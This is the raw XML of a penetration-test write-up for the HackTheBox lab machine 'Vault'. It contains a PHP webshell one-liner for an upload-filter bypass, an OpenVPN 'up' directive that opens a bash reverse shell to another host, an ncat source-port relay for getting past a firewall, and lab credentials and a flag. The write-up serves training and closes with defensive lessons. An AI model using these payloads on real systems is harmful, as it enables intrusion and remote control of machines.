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color w:val="9FEF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">VAULT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test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Target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10.129.X.X (Vault)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Difficulty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Linux (Ubuntu 16.04)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2026-03-27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Root — GPG-encrypted flag decrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vault is a Medium-difficulty Linux machine requiring a multi-level pivoting path through three separate virtualized environments. The initial compromise occurs via a PHP upload filter bypass on a web application, leading to RCE. From there, a vulnerable VPN Configurator is exploited to access an internal DNS VM, firewall restrictions are bypassed via source port filtering, and finally the Vault is reached where the root flag is GPG-encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Attack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Enum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Gobuster + directory bruteforce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Discovered /sparklays/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Upload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 filter bypass (.php5)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RCE as www-data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Privesc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Credentials in /home/dave/Desktop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SSH as dave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Pivot DNS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OpenVPN config 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on 192.168.122.4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Firewall Bypass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ncat relay source port 53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 to Vault:987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Flag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GPG decrypt (itscominghome)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root.txt decrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Phase 1 — Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The initial Nmap scan with the default 1000 ports returned no results. A full scan with --min-rate 5000 revealed only two open ports: SSH (22) and HTTP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sudo nmap -sC -sV -p- --min-rate 5000 10.129.X.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The homepage reveals two critical pieces of information: the service name 'Slowdaddy' and the client name 'Sparklays'. These hints are used as the starting point for directory enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Phase 2 — Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using 'sparklays' as the base for Gobuster, the site structure is discovered and three interesting endpoints are found: /admin.php, /login.php, and the /design/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gobuster dir -u http://TARGET/sparklays -w common.txt -x php,html,txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The /design/ directory contains design.html with a link to changelogo.php — an unauthenticated file upload. This attack surface is immediately exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Phase 3 — PHP Upload Filter Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The upload form rejects .php files but Apache 2.4 also executes alternative extensions such as .php5 and .phtml. The webshell is uploaded with the .php5 extension, completely bypassing the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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Upload via changelogo.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Access: http://TARGET/sparklays/design/uploads/shell.php5?cmd=id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE obtained as www-data. A reverse shell was established to Kali and subsequently upgraded to a stable shell via pty.spawn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Phase 4 — Credentials and SSH Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploring the filesystem as www-data, three critical files were found in dave's home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itscominghome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GPG passphrase + SSH to Vault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dave / Dav3therav3123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to ubuntu and DNS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DNS:122.4 FW:122.5 Vault:x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network map</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ssh dave@TARGET  # password: Dav3therav3123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Phase 5 — OpenVPN Config RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The DNS VM at 192.168.122.4 exposes a local web interface accessible via wget. The VPN Configurator allows uploading and executing an .ovpn file. OpenVPN supports the 'up' directive that executes a command after connection, allowing arbitrary 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 Malicious OpenVPN payload:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">script-security 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nobind</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">dev null</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">remote 192.168.122.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">up "/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.122.1/6666 0&gt;&amp;1'"</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Trigger via POST to ?function=testvpn</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Result: root shell on DNS VM (192.168.122.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Phase 6 — Firewall Bypass and Vault Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vault (192.168.5.2) is protected by a firewall that filters traffic based on source port. Analyzing /var/log/auth.log on the DNS VM reveals that the firewall accepts connections only from privileged ports (53 or 4444). Port 987 on the Vault is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grep -a "192.168.5" /var/log/auth.log</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Start ncat relay on DNS VM:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 4444"</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SSH through tunnel from ubuntu:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -p 1234 dave@192.168.122.4  # password: dav3gerous567</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Access to the Vault as dave. The shell is rbash (restricted bash) but root.txt.gpg is readable. The file is copied to ubuntu via SSH without entering the interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Phase 7 — GPG Decryption and Root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ssh -p 1234 dave@192.168.122.4 "cat root.txt.gpg" &gt; /tmp/root.txt.gpg</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">gpg --decrypt /tmp/root.txt.gpg  # passphrase: itscominghome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 in /var/www/DNS/desktop/user.txt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DNS VM (root)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ca468370b91d1f5906e31093d9bfe819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(GPG decrypt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Network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ubuntu</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10.129.X.X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 host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SSH dave:Dav3therav3123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(virt)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192.168.122.1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Virtualization bridge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host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192.168.122.4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DNS VM + VPN config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OpenVPN RCE → root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Firewall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192.168.122.5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192.168.5.x gateway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compromised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Vault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192.168.5.2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target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SSH:987 source-port 53/4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Upload Filter Bypass: filtering only the .php extension is not enough. Block .php5, .phtml, .phar, and all executable variants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenVPN Config RCE: never expose an interface that executes arbitrary .ovpn files without authentication and sandboxing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cleartext credentials: never save credentials in plaintext files in a user home accessible by www-data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Source Port Firewall: firewall rules based on source port are easily bypassed with ncat/socat relays.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GPG Encryption: good practice to encrypt sensitive files, but the key was on the same machine.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2026-05-05T17:55:52.361Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-05T17:55:52.361Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>